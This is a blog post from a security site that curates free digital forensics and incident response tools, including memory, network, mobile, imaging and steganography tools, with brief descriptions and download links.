Penetration Testing Tools, ML and Linux Tutorials
  • Data Science
    • Artificial Intelligence
    • Data Analyst
    • Deep Learning
    • Machine Learning
  • Kali
    • Exploits
    • OSINT
    • Tools
    • Bug Bounty
    • Resources
  • Linux
    • DevOps
    • Docker
    • Kubernetes
    • Git
  • Forensics
    • Cyber Forensics
    • Digital Forensics
    • Linux Forensics
    • Network Forensics
    • Threat Analyst
    • Incident Response
  • SQL
  • CVE
  • Share
  • News
  • Services
    • CrackMyHash
  • Small Business
  • Resources
  • White Papers
  • Crypto News
  • Programming
    • Python
    • NodeJS
    • Java
    • Javascript
    • PHP
    • Agile
    • TypeScript
  • Android
  • SEO
  • Microsoft
    • Azure
    • Dot Net
    • Powershell
  • Networking
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
  • Data Science
    • Artificial Intelligence
    • Data Analyst
    • Deep Learning
    • Machine Learning
    Data Science Command Line
    Machine Learning on Geographical Data
    Data Science Squad Roadmap
    Defence Artificial Intelligence Strategy
    Previous Next
  • Kali
    • Exploits
    • OSINT
    • Tools
    • Bug Bounty
    • Resources
    Foundations of Linux Debugging eBook
    Tools and Techniques for Red Team
    Process Injection Enumeration Tool
    SSH based reverse shell
    Previous Next
  • Linux
    • DevOps
    • Docker
    • Kubernetes
    • Git
    DevOps Learning resources
    Linux Ultimate Guide
    DevOps Roadmap 2022
    Collection of tips on Linux
    Previous Next
  • Forensics
    • Cyber Forensics
    • Digital Forensics
    • Linux Forensics
    • Network Forensics
    • Threat Analyst
    • Incident Response
    Awesome Forensics
    Awesome Event IDs
    Digital Forensics Guide
    Digital Forensics and Incident Response SOC
    Previous Next
  • SQL
    SQL Cheat Sheet
    The Rust SQL Toolkit
    Postgres to Elasticsearch sync
    Awesome SQL Server
    Universal Command Line interface for SQL databases
    Previous Next
  • CVE
  • Share
  • News
  • Services
    • CrackMyHash
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
  • Data Science
    • Artificial Intelligence
    • Data Analyst
    • Deep Learning
    • Machine Learning
    Data Science Command Line
    Machine Learning on Geographical Data
    Data Science Squad Roadmap
    Defence Artificial Intelligence Strategy
    Previous Next
  • Kali
    • Exploits
    • OSINT
    • Tools
    • Bug Bounty
    • Resources
    Foundations of Linux Debugging eBook
    Tools and Techniques for Red Team
    Process Injection Enumeration Tool
    SSH based reverse shell
    Previous Next
  • Linux
    • DevOps
    • Docker
    • Kubernetes
    • Git
    DevOps Learning resources
    Linux Ultimate Guide
    DevOps Roadmap 2022
    Collection of tips on Linux
    Previous Next
  • Forensics
    • Cyber Forensics
    • Digital Forensics
    • Linux Forensics
    • Network Forensics
    • Threat Analyst
    • Incident Response
    Awesome Forensics
    Awesome Event IDs
    Digital Forensics Guide
    Digital Forensics and Incident Response SOC
    Previous Next
  • SQL
    SQL Cheat Sheet
    The Rust SQL Toolkit
    Postgres to Elasticsearch sync
    Awesome SQL Server
    Universal Command Line interface for SQL databases
    Previous Next
  • CVE
  • Share
  • News
  • Services
    • CrackMyHash
Cyber Forensics

Computer Forensics Resources

Stella Sebastian
Posted by Stella Sebastian December 15, 2021

superior_hosting_service

Forensics

The best tools and resources for forensic analysis. Curated list of awesome free forensic analysis tools and resources.


Distributions

NameDescriptionsDownload
bitscoutBitscout is customizable live OS constructor tool written entirely in bash. It’s main purpose is to help you quickly create own remote forensics bootable disk image.github
RemnuxREMnux® is a Linux toolkit for reverse-engineering and analyzing malicious software. REMnux provides a curated collection of free tools created by the community. Analysts can use it to investigate malware without having to find, install, and configure the tools.Download
SANS Investigative Forensics Toolkit (sift)Linux distribution for forensic analysisgithub
Tsurugi LinuxTsurugi Linux is a DFIR open source project that is and will be totally free, independent, without involving any commercial brand Our main goal is share knowledge and “give back to the community”Download
WinFEAs a result of this, WinFE will now load on UEFI as well as legacy systems, without changing BIOS settings. This means that devices, such as the Microsoft Surface Pro can be easily forensically imaged. BitLocker is also supported providing that you have access to either the unlock key or password.Download

Frameworks

NameDescriptionsDownload
AutopsyAutopsy® is a digital forensics platform and graphical interface to The Sleuth Kit® and other digital forensics tools. It is used by law enforcement, military, and corporate examiners to investigate what happened on a computer. You can even use it to recover photos from your camera’s memory card.Download
dffDFF (Digital Forensics Framework) is a Forensics Framework coming with command line and graphical interfaces. DFF can be used to investigate hard drives and volatile memory and create reports about user and system activities.github
dexterForensics acquisition framework designed to be extensible and secure.github
IntelMQIntelMQ is a solution for IT security teams for collecting and processing security feeds using a message queuing protocol.github
KuiperKuiper is a digital investigation platform that provides a capabilities for the investigation team and individuals to parse, search, visualize collected evidences (evidences could be collected by fast traige script like Hoarder).github
Laika BOSSLaika BOSS: Object Scanning System.github
PowerForensicsPowerForensics provides an all in one platform for live disk forensic analysis.github
The Sleuth KitThe Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data. The library can be incorporated into larger digital forensics tools and the command line tools can be directly used to find evidence.github
turbiniaTurbinia is an open-source framework for deploying, managing, and running forensic workloads on cloud platformsgithub
IPED - Indexador e Processador de Evidências DigitaisIPED Digital Forensic Tool. It is an open source software that can be used to process and analyze digital evidence, often seized at crime scenes by law enforcement or in a corporate investigation by private examiners.github
Wombat ForensicsWombat Forensics is a new Forensic Analysis tool built entirely in C and C++. The GUI is built using Qt5, so it may one day work on Windows, Linux and Macintosh systems.github
binwalkFirmware Analysis Toolgithub

Memory Forensics

NameDescriptionsDownload
inVtero.netHigh speed memory analysis framework developed in .NET supports all Windows x64, includes code integrity and write support.github
KeeFarceExtracts passwords from a KeePass 2.x database, directly from memory.github
MemProcFSAn easy and convenient way of accessing physical memory as files a virtual file system.github
RekallRekall Memory Forensic Framework.github
volatilityThe Volatility Framework is a completely open collection of tools,implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples.github
VolUtilityWeb App for Volatility framework.github

Network Forensics

NameDescriptionsDownload
NetworkMinerNetworkMiner is an open source Network Forensic Analysis Tool (NFAT) for Windows (but also works in Linux / Mac OS X / FreeBSD). NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc.Download
WiresharkWireshark is the world’s foremost and widely-used network protocol analyzer. It lets you see what’s happening on your network at a microscopic level and is the de facto (and often de jure) standard across many commercial and non-profit enterprises, government agencies, and educational institutions.Download

Live Forensics

NameDescriptionsDownload
grrGRR Rapid Response: remote live forensics for incident response.github
Linux Expl0rerEasy-to-use live forensics toolbox for Linux endpoints written in Python & Flask.github
migDistributed & real time digital forensics at the speed of the cloud.github
osquerySQL powered operating system analytics.github
UACUAC (Unix-like Artifacts Collector) is a Live Response collection tool for Incident Reponse that makes use of built-in tools to automate the collection of Unix-like systems artifacts. Supported systems: AIX, FreeBSD, Linux, macOS, NetBSD, Netscaler, OpenBSD and Solaris.github

IOC Scanner

NameDescriptionsDownload
FenrirFenrir is a simple IOC scanner bash script.github
LokiScanner for Simple Indicators of Compromise.github
RedlineRedline®, FireEye’s premier free endpoint security tool, provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis and the development of a threat assessment profile.Download
THOR LiteTHOR Lite includes the file system and process scan module as well as module that extracts “autoruns” information on the different platforms.Download

Imaging

NameDescriptionsDownload
dc3ddA patch to the GNU dd program, this version has several features intended for forensic acquisition of data. Highlights include hashing on-the-fly, split output files, pattern writing, a progress meter, and file verification.Download
dcfldddcfldd is an enhanced version of GNU dd with features useful for forensics and security.Download
FTK ImagerFree imageing tool for windows.Download
GuymagerOpen source version for disk imageing on linux systems.Download

Windows Artifacts

NameDescriptionsDownload
BeagleTransform data sources and logs into graphs.github
FREDCross-platform microsoft registry hive editor.Download
LastActivityViewLastActivityView by Nirsoftis a tool for Windows operating system that collects information from various sources on a running system, and displays a log of actions made by the user and events occurred on this computer.Download
LogonTracerInvestigate malicious Windows logon by visualizing and analyzing Windows event log.github
python-evtPure Python parser for classic Windows Event Log files (.evt).github
RegRipper3.0RegRipper is an open source Perl tool for parsing the Registry and presenting it for analysis.github
RegRippyA framework for reading and extracting useful forensics data from Windows registry hives.github

OS X Forensics

NameDescriptionsDownload
APFS FuseThis project is a read-only FUSE driver for the new Apple File System. It also supports software encrypted volumes and fusion drives. Firmlinks are not supported yet.github
mac_apt (macOS Artifact Parsing Tool)mac_apt is a DFIR (Digital Forensics and Incident Response) tool to process Mac computer full disk images (or live machines) and extract data/metadata useful for forensic investigation.github
MacLocationsScraperDump the contents of the location database files on iOS and macOS.github
macMRUParserPython script to parse the Most Recently Used (MRU) plist files on macOS into a more human friendly format.github
OSXAuditorOS X Auditor is a free Mac OS X computer forensics tool.github
OSX CollectOSXCollector is a forensic evidence collection & analysis toolkit for OSX.github

Mobile Forensics

NameDescriptionsDownload
AndrillerAndriller – is software utility with a collection of forensic tools for smartphones. It performs read-only, forensically sound, non-destructive acquisition from Android devices.github
ALEAPPAndroid Logs Events And Protobuf Parser.github
ArtExDoubleBlak Digital Forensics is a Digital Forensics web site aimed at helping forensic examiners. I am Ian Whiffin, an ex-Law Enforcement Officer / Digital Forensics Examiner with a mid-sized municipal police agency.Download
iLEAPPAn iOS Logs, Events, And Plists Parser.github
iOS Frequent Locations DumperDump the contents of the StateModel#.archive files located in /private/var/mobile/Library/Caches/com.apple.routined/github
MEATPerform different kinds of acquisitions on iOS devices.github
MobSFAn automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.github
OpenBackupExtractorAn app for extracting data from iPhone and iPad backups.github

Docker Forensics

NameDescriptionsDownload
dof (Docker Forensics Toolkit)A toolkit for the post-mortem examination of Docker containers from forensic HDD copies.github
Docker ExplorerExtracts and interprets forensic artifacts from disk images of Docker Host systems.github

Picture Analysis

NameDescriptionsDownload
GhiroA fully automated tool designed to run forensics analysis over a massive amount of images.Download
sherloqForensic Image Analysis is the application of image science and domain expertise to interpret the content of an image and/or the image itself in legal matters.github
Image Analyzeris a program that you can use to view and edit image files. The interface of the tool is plain and easy to navigate through. Image Analyzer definitely needs some improvements when it comes to its appearance, since it’s a little outdated. Pictures can be opened via the file browser only, since the “drag and drop” method is not supported. So, you can configure file format options, such as compression level, transparent color key, quality and file size.Download
pngcheckpngcheck verifies the integrity of PNG, JNG and MNG files (by checking the internal 32-bit CRCs, a.k.a. checksums, and decompressing the image data); it can optionally dump almost all of the chunk-level information in the image in human-readable form. For example, it can be used to print the basic statistics about an image (dimensions, bit depth, etc.); to list the color and transparency info in its palette (assuming it has one); or to extract the embedded text annotations. This is a command-line program with batch capabilities.Download

Metadata Forensics

NameDescriptionsDownload
ExifToolExifTool is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files.Download
FOCAFOCA is a tool used mainly to find metadata and hidden information in the documents.github

Steganography

NameDescriptionsDownload
SonicvisualizerSonic Visualiser is a free, open-source application for Windows, Linux, and Mac, designed to be the first program you reach for when want to study a music recording closely.Download
Steghideis a steganography program that hides data in various kinds of image and audio files.github
WavstegA steganographic coder for WAV files. github
ZstegA steganographic coder for WAV files.github
OutguessOutguess is an advanced steganography tool. Outguess will conceal your document inside image (JPG) of your choice.github

Management

NameDescriptionsDownload
dfirtrackDigital Forensics and Incident Response Tracking application, track systems.github
IncidentsWeb application for organizing non-trivial security investigations. Built on the idea that incidents are trees of tickets, where some tickets are leads.github

Decryption

NameDescriptionsDownload
hashcatFast password cracker with GPU supportDownload
John the RipperJohn the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems. John the Ripper jumbo supports hundreds of hash and cipher types, including for: user passwords of Unix flavors (Linux, *BSD, Solaris, AIX, QNX, etc.), macOS, Windows, “web apps” (e.g., WordPress), groupware (e.g., Notes/Domino), and database servers (SQL, LDAP, etc.); network traffic captures (Windows network authentication, WiFi WPA-PSK, etc.); encrypted private keys (SSH, GnuPG, cryptocurrency wallets, etc.), filesystems and disks (macOS .dmg files and “sparse bundles”, Windows BitLocker, etc.), archives (ZIP, RAR, 7z), and document files (PDF, Microsoft Office’s, etc.) These are just some of the examples – there are many more.Download

Disk image handling

NameDescriptionsDownload
Disk ArbitratorA Mac OS X forensic utility designed to help the user ensure correct forensic procedures are followed during imaging of a disk device.github
imagemounterCommand line utility and Python package to ease the (un)mounting of forensic disk images.github
libewfLibewf is a library and some tools to access the Expert Witness Compression Format (EWF, E01).github
PancakeViewerDisk image viewer based in dfvfs, similar to the FTK Imager viewer.github
xmountConvert between different disk image formats.Download

Resources

Namedetail
Learning Network ForensicsLearning Network Forensics by packt
Steganography for the Computer ForensicsAn Overview of Steganography forthe Computer Forensics Examiner
image forensicsLearning Rich Features for Image Manipulation Detection.
Docker ForensicsDocker Forensics for Containers
memory forensicsLearn Windows memory forensics
Smartphone ForensicSmartphone Forensic Analysis In-Depth

Github Link
Linux Commands

Tags: Computer Forensics DFIR Memory Forensics Metadata Forensics Steganography
0 Shares
Share on Facebook Share on Twitter Share on Pinterest Share on Email
Stella Sebastian December 15, 2021
Previous Article Huobi Token Price Prediction
Next Article Avalanche Coin Price Prediction

Leave a Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Latest Posts

Foundations of Linux Debugging eBook

February 24, 2023

Tools and Techniques for Red Team

December 26, 2022

Process Injection Enumeration Tool

December 20, 2022

SSH based reverse shell

December 18, 2022
HostnExtra Ads
Neevahost ad post

You Might Also Enjoy

Cyber Forensics

Awesome Forensics

November 29, 2022
Digital Forensics

Awesome Event IDs

November 9, 2022
Agile

Agile Security Operations

October 10, 2022
Resources

Cloud Security Resources

May 10, 2022
Load More
  • ABOUT
  • ADVERTISEMENT
  • TEAM
  • JOBS
  • CONTACT
  • PRIVACY POLICY
  • DISCLOSURE

© 2021 Reconshell All Rights Reserved.